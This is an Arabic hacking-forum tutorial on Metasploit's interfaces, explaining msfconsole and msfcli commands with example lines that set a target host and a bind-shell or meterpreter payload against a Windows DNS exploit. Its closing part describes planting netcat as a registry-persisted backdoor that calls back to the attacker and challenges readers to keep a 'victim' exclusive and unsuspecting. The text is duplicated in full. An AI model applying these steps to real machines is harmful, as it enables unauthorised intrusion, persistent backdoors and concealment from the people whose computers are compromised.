عشوووق
11-04-2010, 11:26 PM
السلام عليكم ورحمه الله
اليوم درسنا راح يتكلم عن كيفيه التعامل مع واجهات الميتاسبلويت
وهي
1- msfconsole
msfcli -2
msfgui -3
msfw eb -4
msfconsole: هي الواجه المفضله لدي , اولا لانها تتعامل مع سطر الاوامر , ثانيا استخدام اوامر
الليونكس بداخلها , بمعنى اخر بأمكان الفحص والتعامل مع اوامر الليونكس وانت بداخلها .
msfcli : اداه قويه من ناحيه الفكره وسريعه ايضا , بأمكانك استغلال الثغره بدون الدخول الى
msfconsle , استغلال الثغره يتم بسطر واحد , على حسب اعتقادي الاداه هذه
وضعوها ليتم كتابه السكربتات وادواات تستخدم الميتاسبلويت مثل fasttrack
msfgui : الميتاسبلويت بواجه رسوميه ,, لكن لا انصح بها بتاتا اولا الواجهه بطيئه
ثانيا الواجهة ارى ان التعامل معها صعب وايضا ممل http://v4-team.com/cc/images/smilies/biggrin.gif
msfwe b : واجهة رسوميه , لكن افضل من سابقتها , لا افضل استعمالها لانها بطيئه ايضا
راح اشرح msfconsole , msfcli لان بمعرفتهم تعرف كيفيه التعامل مع الاخريات .
1- msfconsole
راح اشرح الاوامر المهمه
1- show
الامر هذا يقصد به اعرض سواء payload encoder nops exploits auxiliary , options all
مثال :
show exploits
عرض الثغرات
show payloads
عرض payloads
show encoders
عرض encoders
show nops
عرض nops
show auxiliary
عرض auxiliary
show options
عرض الخيارات
2- use
بمعنى استخدم الثغره او auxiliary
مثال :
كود PHP:
use exploit/windows/smb/msdns_zone****
كود PHP:
use auxiliary/scanner/smb/version
البعض يتسائل كيف احفظ اسم الثغره كامل ؟
ما يحتاج كل الي عليك كتابه use ex ومن ثم اضغط زر Tab على الكيبورد وراح يكمل كل شيء
3- info
عرض معلومات الثغره
مثال :
كود PHP:
info exploit/windows/smb/msdns_zone****
او
كود PHP:
use exploit/windows/smb/msdns_zone****
ثم
info
set -4
بمعنى ضع للمتغير قيمه
مثال
set rhost 192.168.1.3
set payload windows/shell_bind_tcp
connect -5
مثل اداه النت كات
exploit and run -6
exploit تستخدم لتشغيل الثغرات
run يستخدم لتشغيل auxiliary
back -7
العوده للوراء
مثال :
كود PHP:
msf exploit(msdns_zone****) > back
msf >
بقيه الاوامر راح تكتشفها مع الاستخدام بأذن الله
نروح لطريقه استخدام الثغره
استخدامها سهل ما تتعدا خمس اوامر http://v4-team.com/cc/images/smilies/biggrin.gif
كود PHP:
اسم الثغره use
show option
ليتم عرض المتغيرات
اسم المتغير set
exploit
بعض الخيارات المخفيه حين اختيار الثغره .
show advanced
show evasion
ما انصح بتغيير خياراتهم الا اذا كنت فاهم المطلوب لان من كل ثغره لثغره تختلف , وبعض المرات
الثغره ما تشتغل الا بعد تعديل بعض الخيارات طبعا هذا بناء على جهاز ضحيتك ,
show targets
عرض الاهداف التي تشتغل الثغره عليها
نروح للاداه الاخرى msfcli
نروح لكيفيه الاستخدام
استخدامها سهل جدا وعن طريق سطر واحد
كود PHP:
Usage: ./msfcli <exploit_****> <option=value> [mode]
================================================== ==
Mode De******************ion
---- -----------
(H)elp Youre looking at it baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
S = ملعومات الثغره
O = خيارات الثغره
ِE = تشغيل الثغره
P = عرض بايلود الخاصه
مثال لاستغلال ثغره
كود PHP:
./msfcli exploit/windows/*** payload=windows/meterpreter/** rhost=A.B.C.D lhost=1.1.1.1
بدال ما نكتب داخل msfconsole
كود PHP:
set rhost a.b.c.d
set payload windows/****
نضع
rhost=
payload=
هذا الشرح كمختصر بأمكانك التطبيق
انا عندي تطبيق قديم اسمه hacking the ip first guide مسويه قبل سنه
كانت عندي سلسله لكن طارت http://v4-team.com/cc/images/smilies/biggrin.gif
تابع التطبيق , ومن ثم يأتي وقت السؤال
ملاحظه : اهم شيء التطبيق للثغره
بعد ما تابعنا الفديو جاء وقت السؤال لكن هذا السؤال لتشغيل المخ , وممكن تصير اكثر من اجابه صح
في الفديو وضعنا النت كات كباك دور ومن ثم سجلناه بالريجستري عشان كل مره يشغل الجهاز يتصل على اي بي المهاجم
انا الان بشبكه داخليه وتعرفون ان الشبكه الداخليه ممكن يتغير اي بي بتاعك حين تفصل الاتصال من المودم
ا
او بأي طريق اخرى , طيب حين تفصل ممكن واحد يأخذ اي بي بتاعك , بكل تأكيد راح يطير الضحيه http://v4-team.com/cc/images/smilies/rolleyes.gif
انا ما ابي اثبت الاي بي بتاعي داخل الشبكه , لذلك نحتاج اتصال مباشر بمعنى اخر انا اللي اتصل بالضحيه مش الضحيه اللي يبي يتصل بي http://v4-team.com/cc/images/smilies/biggrin.gif
لكن المشكله ان اي شخص غيري يقدر يتصل بعد لان اتصال مباشر
كيف اخلي الضحيه خاص بي بمعنى اخر انا اللي ابغى اتصل لوحدي ولا ابي احد يتصل معي http://v4-team.com/cc/images/smilies/biggrin.gif
وايضا ما ابي اخلي الضحيه يشك http://v4-team.com/cc/images/smilies/biggrin.gif
انا ابغى ناس تفكر مش تفتح القوقل وتبحث :-)
اليوم درسنا راح يتكلم عن كيفيه التعامل مع واجهات الميتاسبلويت
وهي
1- msfconsole
msfcli -2
msfgui -3
msfw eb -4
msfconsole: هي الواجه المفضله لدي , اولا لانها تتعامل مع سطر الاوامر , ثانيا استخدام اوامر
الليونكس بداخلها , بمعنى اخر بأمكان الفحص والتعامل مع اوامر الليونكس وانت بداخلها .
msfcli : اداه قويه من ناحيه الفكره وسريعه ايضا , بأمكانك استغلال الثغره بدون الدخول الى
msfconsle , استغلال الثغره يتم بسطر واحد , على حسب اعتقادي الاداه هذه
وضعوها ليتم كتابه السكربتات وادواات تستخدم الميتاسبلويت مثل fasttrack
msfgui : الميتاسبلويت بواجه رسوميه ,, لكن لا انصح بها بتاتا اولا الواجهه بطيئه
ثانيا الواجهة ارى ان التعامل معها صعب وايضا ممل http://v4-team.com/cc/images/smilies/biggrin.gif
msfwe b : واجهة رسوميه , لكن افضل من سابقتها , لا افضل استعمالها لانها بطيئه ايضا
راح اشرح msfconsole , msfcli لان بمعرفتهم تعرف كيفيه التعامل مع الاخريات .
1- msfconsole
راح اشرح الاوامر المهمه
1- show
الامر هذا يقصد به اعرض سواء payload encoder nops exploits auxiliary , options all
مثال :
show exploits
عرض الثغرات
show payloads
عرض payloads
show encoders
عرض encoders
show nops
عرض nops
show auxiliary
عرض auxiliary
show options
عرض الخيارات
2- use
بمعنى استخدم الثغره او auxiliary
مثال :
كود PHP:
use exploit/windows/smb/msdns_zone****
كود PHP:
use auxiliary/scanner/smb/version
البعض يتسائل كيف احفظ اسم الثغره كامل ؟
ما يحتاج كل الي عليك كتابه use ex ومن ثم اضغط زر Tab على الكيبورد وراح يكمل كل شيء
3- info
عرض معلومات الثغره
مثال :
كود PHP:
info exploit/windows/smb/msdns_zone****
او
كود PHP:
use exploit/windows/smb/msdns_zone****
ثم
info
set -4
بمعنى ضع للمتغير قيمه
مثال
set rhost 192.168.1.3
set payload windows/shell_bind_tcp
connect -5
مثل اداه النت كات
exploit and run -6
exploit تستخدم لتشغيل الثغرات
run يستخدم لتشغيل auxiliary
back -7
العوده للوراء
مثال :
كود PHP:
msf exploit(msdns_zone****) > back
msf >
بقيه الاوامر راح تكتشفها مع الاستخدام بأذن الله
نروح لطريقه استخدام الثغره
استخدامها سهل ما تتعدا خمس اوامر http://v4-team.com/cc/images/smilies/biggrin.gif
كود PHP:
اسم الثغره use
show option
ليتم عرض المتغيرات
اسم المتغير set
exploit
بعض الخيارات المخفيه حين اختيار الثغره .
show advanced
show evasion
ما انصح بتغيير خياراتهم الا اذا كنت فاهم المطلوب لان من كل ثغره لثغره تختلف , وبعض المرات
الثغره ما تشتغل الا بعد تعديل بعض الخيارات طبعا هذا بناء على جهاز ضحيتك ,
show targets
عرض الاهداف التي تشتغل الثغره عليها
نروح للاداه الاخرى msfcli
نروح لكيفيه الاستخدام
استخدامها سهل جدا وعن طريق سطر واحد
كود PHP:
Usage: ./msfcli <exploit_****> <option=value> [mode]
================================================== ==
Mode De******************ion
---- -----------
(H)elp Youre looking at it baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
S = ملعومات الثغره
O = خيارات الثغره
ِE = تشغيل الثغره
P = عرض بايلود الخاصه
مثال لاستغلال ثغره
كود PHP:
./msfcli exploit/windows/*** payload=windows/meterpreter/** rhost=A.B.C.D lhost=1.1.1.1
بدال ما نكتب داخل msfconsole
كود PHP:
set rhost a.b.c.d
set payload windows/****
نضع
rhost=
payload=
هذا الشرح كمختصر بأمكانك التطبيق
انا عندي تطبيق قديم اسمه hacking the ip first guide مسويه قبل سنه
كانت عندي سلسله لكن طارت http://v4-team.com/cc/images/smilies/biggrin.gif
تابع التطبيق , ومن ثم يأتي وقت السؤال
ملاحظه : اهم شيء التطبيق للثغره
بعد ما تابعنا الفديو جاء وقت السؤال لكن هذا السؤال لتشغيل المخ , وممكن تصير اكثر من اجابه صح
في الفديو وضعنا النت كات كباك دور ومن ثم سجلناه بالريجستري عشان كل مره يشغل الجهاز يتصل على اي بي المهاجم
انا الان بشبكه داخليه وتعرفون ان الشبكه الداخليه ممكن يتغير اي بي بتاعك حين تفصل الاتصال من المودم
ا
او بأي طريق اخرى , طيب حين تفصل ممكن واحد يأخذ اي بي بتاعك , بكل تأكيد راح يطير الضحيه http://v4-team.com/cc/images/smilies/rolleyes.gif
انا ما ابي اثبت الاي بي بتاعي داخل الشبكه , لذلك نحتاج اتصال مباشر بمعنى اخر انا اللي اتصل بالضحيه مش الضحيه اللي يبي يتصل بي http://v4-team.com/cc/images/smilies/biggrin.gif
لكن المشكله ان اي شخص غيري يقدر يتصل بعد لان اتصال مباشر
كيف اخلي الضحيه خاص بي بمعنى اخر انا اللي ابغى اتصل لوحدي ولا ابي احد يتصل معي http://v4-team.com/cc/images/smilies/biggrin.gif
وايضا ما ابي اخلي الضحيه يشك http://v4-team.com/cc/images/smilies/biggrin.gif
انا ابغى ناس تفكر مش تفتح القوقل وتبحث :-)